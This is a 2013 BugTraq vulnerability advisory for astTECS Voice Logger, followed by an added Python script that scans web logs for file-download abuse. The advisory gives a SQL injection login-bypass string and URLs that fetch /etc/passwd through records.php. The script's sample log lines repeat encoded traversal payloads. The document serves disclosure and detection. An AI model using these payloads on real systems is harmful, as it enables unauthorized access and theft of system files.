BugTraq
Voice Logger astTECS - bypass login & arbitrary file download
Jul 16 2013 09:01AM
Michał Błaszczak (blaszczakm gmail com)
Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
line: 2 file: records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
line: 2 file: records.php

3) and other security bugs

Michał Błaszczak
http://blaszczakm.blogspot.com
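
Added example, not part of the original advisory and not astTECS code: a log check for the file download issue in item 2, flagging requests to records.php or records1.php whose file parameter is an absolute path or climbs out of the recordings directory. The combined log format, the /asttecs/ path, the recording file name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script names come from the advisory; everything else is an assumption.
SCRIPTS = ("records.php", "records1.php")
# Combined log format: client ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so nested encodings are compared in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_param(target):
    """Return the decoded `file` value if it is not a bare file name, else None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] not in SCRIPTS:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        value = fully_decode(raw).replace("\\", "/")
        if value.startswith("/") or ".." in value.split("/") or "\x00" in value:
            return value
    return None

def scan(lines):
    """Return (client, status, decoded file value) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        value = suspicious_file_param(target)
        if value is not None:
            hits.append((client, int(status), value))
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2013:09:00:12 +0200] "GET /asttecs/records.php?file=call_0001.wav HTTP/1.1" 200 48211',
    '198.51.100.7 - - [16/Jul/2013:09:01:00 +0200] "GET /asttecs/records.php?file=/etc/passwd HTTP/1.1" 200 1204',
    '198.51.100.7 - - [16/Jul/2013:09:01:05 +0200] "GET /asttecs/records1.php?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1204',
    '192.0.2.10 - - [16/Jul/2013:09:02:30 +0200] "GET /asttecs/index.php?file=/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} file={value}")
```

A flagged request answered with status 200 is the case to triage first, since the file was most likely served.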
